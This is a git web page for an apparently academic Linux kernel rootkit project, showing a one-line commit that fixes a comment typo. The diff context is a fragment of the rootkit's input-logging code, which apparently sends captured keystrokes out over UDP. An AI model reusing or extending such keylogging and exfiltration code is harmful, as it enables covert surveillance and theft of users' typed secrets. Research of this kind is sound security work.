linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 432e0b3254aebe460f8e9d99d5d38c5e229dec0e
parent 58a8855a4cf61223b59d83463b6c579fdc7cadbe
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 14 Dec 2020 13:13:45 +0100

fixes comment typo

Diffstat:
Msrc/inputlog.c | 2+-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/inputlog.c b/src/inputlog.c @@ -80,7 +80,7 @@ send_udp(pid_t pid, struct file *file, char *buf, int buflen) session_hdrlen = build_header(session_buf, pid, file); session_body = session_buf + session_hdrlen; - // escape characters are expanded to their literal chararcter form + // escape characters are expanded to their literal character form session_buflen = expand_escape_chars(session_body, buf, buflen); session_buflen += session_hdrlen + 1;